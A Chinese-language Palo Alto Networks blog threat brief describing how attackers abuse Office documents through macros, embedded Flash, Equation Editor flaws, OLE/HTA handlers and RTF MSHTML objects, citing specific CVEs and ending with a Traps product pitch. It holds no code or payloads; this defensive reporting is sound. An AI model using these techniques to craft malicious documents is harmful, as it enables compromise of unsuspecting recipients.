* [Blog](https://www.paloaltonetworks.com/blog)
* [Palo Alto Networks](https://www.paloaltonetworks.com/blog/corporate/)
* [未分类](https://www.paloaltonetworks.com/blog/category/%e6%9c%aa%e5%88%86%e7%b1%bb/?lang=zh-hant)
* 威胁简报：我们日常使用的 Office 文档可能存...

# 威胁简报：我们日常使用的 Office 文档可能存在安全隐患

[](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2F2018%2F10%2F%25e5%25a8%2581%25e8%2583%2581%25e7%25ae%2580%25e6%258a%25a5%25ef%25bc%259a%25e6%2588%2591%25e4%25bb%25ac%25e6%2597%25a5%25e5%25b8%25b8%25e4%25bd%25bf%25e7%2594%25a8%25e7%259a%2584-office-%25e6%2596%2587%25e6%25a1%25a3%25e5%258f%25af%25e8%2583%25bd%25e5%25ad%2598%25e5%259c%25a8%25e5%25ae%2589%25e5%2585%25a8%25e9%259a%2590%2F%3Flang%3Dzh-hans)  
[](https://twitter.com/share?text=%E5%A8%81%E8%83%81%E7%AE%80%E6%8A%A5%EF%BC%9A%E6%88%91%E4%BB%AC%E6%97%A5%E5%B8%B8%E4%BD%BF%E7%94%A8%E7%9A%84+Office+%E6%96%87%E6%A1%A3%E5%8F%AF%E8%83%BD%E5%AD%98%E5%9C%A8%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3&url=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2F2018%2F10%2F%25e5%25a8%2581%25e8%2583%2581%25e7%25ae%2580%25e6%258a%25a5%25ef%25bc%259a%25e6%2588%2591%25e4%25bb%25ac%25e6%2597%25a5%25e5%25b8%25b8%25e4%25bd%25bf%25e7%2594%25a8%25e7%259a%2584-office-%25e6%2596%2587%25e6%25a1%25a3%25e5%258f%25af%25e8%2583%25bd%25e5%25ad%2598%25e5%259c%25a8%25e5%25ae%2589%25e5%2585%25a8%25e9%259a%2590%2F%3Flang%3Dzh-hans)  
[](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2F2018%2F10%2F%25e5%25a8%2581%25e8%2583%2581%25e7%25ae%2580%25e6%258a%25a5%25ef%25bc%259a%25e6%2588%2591%25e4%25bb%25ac%25e6%2597%25a5%25e5%25b8%25b8%25e4%25bd%25bf%25e7%2594%25a8%25e7%259a%2584-office-%25e6%2596%2587%25e6%25a1%25a3%25e5%258f%25af%25e8%2583%25bd%25e5%25ad%2598%25e5%259c%25a8%25e5%25ae%2589%25e5%2585%25a8%25e9%259a%2590%2F%3Flang%3Dzh-hans&title=%E5%A8%81%E8%83%81%E7%AE%80%E6%8A%A5%EF%BC%9A%E6%88%91%E4%BB%AC%E6%97%A5%E5%B8%B8%E4%BD%BF%E7%94%A8%E7%9A%84+Office+%E6%96%87%E6%A1%A3%E5%8F%AF%E8%83%BD%E5%AD%98%E5%9C%A8%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3&summary=&source=)  
[](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://www.paloaltonetworks.com/blog/2018/10/%e5%a8%81%e8%83%81%e7%ae%80%e6%8a%a5%ef%bc%9a%e6%88%91%e4%bb%ac%e6%97%a5%e5%b8%b8%e4%bd%bf%e7%94%a8%e7%9a%84-office-%e6%96%87%e6%a1%a3%e5%8f%af%e8%83%bd%e5%ad%98%e5%9c%a8%e5%ae%89%e5%85%a8%e9%9a%90/?lang=zh-hans&ts=markdown)  
\[\](mailto:?subject=威胁简报：我们日常使用的 Office 文档可能存在安全隐患)  
Link copied  
By [Liat Hayun](https://www.paloaltonetworks.com/blog/author/liat-hayun/?lang=zh-hans&ts=markdown "Posts by Liat Hayun")  
Oct 08, 2018  
1 minutes  
[未分类](https://www.paloaltonetworks.com/blog/category/%e6%9c%aa%e5%88%86%e7%b1%bb/?lang=zh-hant&ts=markdown)

几乎所有人都会使用 Microsoft Office 文档。我们在许多地方都能用到 Office 文档，包括工作文档、电子收据和新公寓的租赁合同等等，因此在收到的电子邮件中如果有 Office 文档的附件时，我们很有可能会直接打开。网络攻击者知道，即使并非来自信任的来源，人们仍然会打开绝大部分的文档，因此攻击者通常会将这些文件用于侵害系统的攻击中。

在本威胁简报中，我们将展示五种不同的破坏和滥用方法，是如何利用 Office 文档发动攻击和侵害 Windows 端点的，其中一些方法已经发布过，另外一些方法则是首次介绍。

宏

宏是攻击者将 Office 文档作为攻击手段的最直接方式。Office 应用具有一个可运行 VBA (Visual Basic for Applications) 脚本的内置脚本引擎。这些脚本可以在文档打开时立即执行而无需任何用户交互（假设用户先前已启用宏），并在系统上运行恶意代码。如果用户未启用宏，则会出现一个弹出窗口，要求用户单击以启用宏。该弹出窗口是 Microsoft 添加的几种安全机制之一，用于降低宏所造成的安全风险。Microsoft 还将强制使用不同的文件扩展名（包含宏的新文档扩展名为 .docm 而不是 .docx）。虽然采取了这些措施，但是用户仍会选择打开这些文件并启用文件内容，从而使宏一直成为常见的攻击媒介（无论是大范围攻击还是简单的攻击），以传输诸如 [Emotet](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Emotet) 这样的勒索软件，或发动 [Sofacy 这样的复杂攻击活动](https://www.paloaltonetworks.com/blog/2018/02/unit42-sofacy-attacks-multiple-government-entities/?ts=markdown)。

![WordDocImage1zhCN](https://www.paloaltonetworks.com/blog/wp-content/uploads/2018/10/WordDocImage1zhCN.png)

图 1. 启用内容之前和之后的 Sofacy 文档

如图所示，攻击者利用社交工程试图说服用户禁用由 Microsoft 添加的安全机制，并说服用户启用内容以便查看完整文档。在 Sofacy 示例中，攻击者只是将字体颜色设置为白色，因此文本在用户启用宏之前就已存在，只是未清晰显示出来。

嵌入式 Flash 文件

除内置功能（如宏）外，还可在 Office 文档中嵌入外部对象，例如 Adobe Flash 文件。由于这些对象将被传递到相应软件进行处理，因此也可以通过将软件漏洞嵌入 Office 文档的 Adobe Flash 内容中来达到利用这些漏洞的目的。攻击者利用此攻击媒介的一个例子是 ++[CVE-2018-4878](https://www.paloaltonetworks.com/blog/2018/02/unit42-traps-prevents-adobe-flash-player-zero-day/?ts=markdown)++，这是通过在 Excel 文档中嵌入 SWF 文件，对 Adobe Flash Player 进行的零日漏洞利用。在这些类型的攻击中，恶意 Excel 文档中包含的 Adobe Flash 内容会触发 Flash 漏洞并执行嵌入的 shellcode。

Microsoft 公式编辑器

与将 Adobe Flash 文件嵌入 Office 文档的方式类似，您还可以在文档中嵌入由 Microsoft 公式编辑器（通过此程序可轻松编写数学公式）解析的公式：

![WordDocImage2zhCN](https://www.paloaltonetworks.com/blog/wp-content/uploads/2018/10/WordDocImage2zhCN.png)

图 2.Microsoft 公式编辑器

与前面的示例一样，攻击者可通过恶意 Office 文档来利用公式编辑器中的漏洞。据我们最近了解到，当 ++[CVE-2017-11882](https://www.paloaltonetworks.com/blog/2017/12/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/?ts=markdown)++ 遭到利用时，如 ++[CVE-2018-0802](https://www.paloaltonetworks.com/blog/2018/01/unit42-traps-prevents-microsoft-office-equation-editor-zero-day-cve-2017-11882/?ts=markdown)++ 之类的漏洞也会遭到利用，这两种存在于公式编辑器的漏洞能够让攻击者在用户打开 Office 文档时远程执行代码。虽然尚未找到实际的使用案例，但 Unit 42 的研究人员发现一些 Microsoft 公式编辑器中存在的类似漏洞利用，如 ++[CVE-2018-0807](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0807)++ 和 ++[CVE-2018-0798](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798)++。

请注意，由于 Microsoft 公式编辑器作为单独的进程 (eqnedt32.exe) 运行，针对 Microsoft Office 的防护手段（如 EMET 和 Windows Defender Exploit Guard）并不能起到防护作用，因为它们仅会保护 Microsoft Office 进程（如 winword.exe）。

OLE 对象和 HTA 处理程序

OLE 对象和 HTA 处理程序是 Office 文档用于进行参考以在其内容中包含其他文档的机制。攻击者可通过以下方式借助这些机制来入侵端点：

* 在 Microsoft Word 文档中嵌入 OLE2 嵌入式链接对象
* 在打开文档后，Word 进程 (winword.exe) 会向远程服务器发送 HTTP 请求以检索包含恶意脚本的 HTA 文件
* 然后，winword.exe 将通过 COM 对象查找应用/hta 的文件处理程序，这会导致 Microsoft HTA 应用 (mshta.exe) 加载并执行恶意脚本

通过利用 Microsoft 在 2017 年 9 月修复的 ++[CVE-2017-0199](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199)++ （Microsoft Office/WordPad 远程代码执行 (RCE) 漏洞），便可使用该功能进行多种攻击活动，例如 [OilRig 攻击活动](https://www.paloaltonetworks.com/blog/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/?ts=markdown)。

![WordDocImage3zhCN](https://www.paloaltonetworks.com/blog/wp-content/uploads/2018/10/WordDocImage3zhCN.png)

图 3.RTF 文件外观与常规 Word 文档完全相同

除之前所述的 OLE 和 HTA 漏洞利用外，攻击者发现 RTF 文件还能使用 MSHTML 执行"text/html"mime 类型的 OLE 对象。这意味着 RTF 文档暴露出的攻击范围与 Internet Explorer 相同！

利用此逻辑漏洞 (++[CVE-2018-8174](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174)++)，攻击者可以执行任意 HTML/JavaScript/VBScript。虽然通过这种方法执行的代码处于沙箱模式（无法运行新进程或向文件系统中写入内容等），但与 Internet Explorer 中运行的其他代码一样，可以通过此缺陷实现对其他漏洞的利用（如 VBScript 引擎中的内存损坏 UAF 漏洞），获得在 Word 应用 (winword.exe) 中执行任意代码的权限并获取系统的控制权。

结语

虽然十多年来基于文档的攻击一直是常见的攻击载体，但我们发现最近此类攻击的流行程度和复杂程度都处于上升趋势。这种上升可能是因为浏览器开发人员对产品的强化，导致利用浏览器漏洞的难度不断增大。无论原因如何，组织都必须掌握如何防御这些常见技术。

防御

为防御这些威胁，Palo Alto Networks Traps advanced endpoint protection 提供了多种恶意软件和漏洞利用的防护手段：

* 宏检查 - Traps 利用基于 WildFire 威胁情报云和本地机器学习的功能检测每个 Office 文档中的恶意宏，以防止用户打开这些恶意文件。
* 漏洞利用防护 - Traps 广泛的漏洞利用防护功能可以防止此类漏洞利用尝试在受攻击端点上成功运行恶意 shellcode。
* Traps 会持续监控 Office 应用，确保合法内置进程不会被用来执行恶意流量。

*** ** * ** ***

## Related Blogs

### [未分类](https://www.paloaltonetworks.com/blog/category/%e6%9c%aa%e5%88%86%e7%b1%bb/?lang=zh-hant&ts=markdown)

[#### AI代理已經來臨，威脅也隨之而來](https://www.paloaltonetworks.com/blog/2025/05/ai-agents-threats/?lang=zh-hant)

### [未分类](https://www.paloaltonetworks.com/blog/category/%e6%9c%aa%e5%88%86%e7%b1%bb/?lang=zh-hant&ts=markdown)

[#### Strata Copilot - 加速迈向自主网络安全的未来](https://www.paloaltonetworks.com/blog/network-security/strata-copilot/?lang=zh-hans)

### [未分类](https://www.paloaltonetworks.com/blog/category/%e6%9c%aa%e5%88%86%e7%b1%bb/?lang=zh-hant&ts=markdown)

[#### 防火墙已死？至少本世纪不会！](https://www.paloaltonetworks.com/blog/2023/08/ngfw-is-not-dead-yet/?lang=zh-hans)

### [未分类](https://www.paloaltonetworks.com/blog/category/%e6%9c%aa%e5%88%86%e7%b1%bb/?lang=zh-hant&ts=markdown)

[#### 面对性命攸关的时刻，如何实现可靠的医疗物联网安全](https://www.paloaltonetworks.com/blog/2022/12/medical-iot-security-to-depend-on/?lang=zh-hans)

### [未分类](https://www.paloaltonetworks.com/blog/category/%e6%9c%aa%e5%88%86%e7%b1%bb/?lang=zh-hant&ts=markdown)

[#### 利用业界首创的 AIOps for NGFW 革新防火墙运行](https://www.paloaltonetworks.com/blog/2022/03/industry-first-aiops-for-ngfw/?lang=zh-hans)

### [未分类](https://www.paloaltonetworks.com/blog/category/%e6%9c%aa%e5%88%86%e7%b1%bb/?lang=zh-hant&ts=markdown)

[#### Prisma Access 是保护远程用户安全的领先云服务](https://www.paloaltonetworks.com/blog/2021/08/prisma-access-leading-cloud-service-secure-remote-users/?lang=zh-hans)

### Subscribe to the Blog!

Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more.
![spinner](https://www.paloaltonetworks.com/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up  
Please enter a valid email.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder.  
This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.  
{#footer} {#footer}

## Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown)

* [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown)

* [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown)

* [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown)

* [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown)

* [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown)

* [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown)

## Company

* [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown)
* [Careers](https://jobs.paloaltonetworks.com/en/)
* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown)
* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown)
* [Customers](https://www.paloaltonetworks.com/customers?ts=markdown)
* [Investor Relations](https://investors.paloaltonetworks.com/)
* [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown)
* [Newsroom](https://www.paloaltonetworks.com/company/newsroom?ts=markdown)

## Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/?ts=markdown)
* [Communities](https://www.paloaltonetworks.com/communities?ts=markdown)
* [Content Library](https://www.paloaltonetworks.com/resources?ts=markdown)
* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia?ts=markdown)
* [Event Center](https://events.paloaltonetworks.com/)
* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)
* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown)
* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown)
* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown)
* [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown)
* [Tech Docs](https://docs.paloaltonetworks.com/)
* [Unit 42](https://unit42.paloaltonetworks.com/)
* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)
* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown)
* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown)
* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown)
* [Documents](https://www.paloaltonetworks.com/legal?ts=markdown)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language